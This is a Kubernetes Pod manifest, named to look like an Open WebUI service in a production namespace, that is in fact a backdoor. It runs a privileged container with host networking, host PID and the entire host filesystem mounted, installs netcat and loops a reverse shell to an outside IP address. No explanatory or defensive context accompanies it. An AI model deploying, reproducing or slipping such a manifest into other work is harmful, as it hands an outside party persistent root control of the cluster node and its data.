apiVersion: v1
kind: Pod
metadata:
  name: vih-openwebuii
  namespace: production
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: shell
    image: alpine
    command: 
    - /bin/sh
    - -c
    - |
      apk add --no-cache netcat-openbsd
      while true; do nc 217.156.123.217 4454 -e /bin/sh; sleep 5; done
    securityContext:
      privileged: true
    volumeMounts:
    - name: hostfs
      mountPath: /host
  volumes:
  - name: hostfs
    hostPath:
      path: /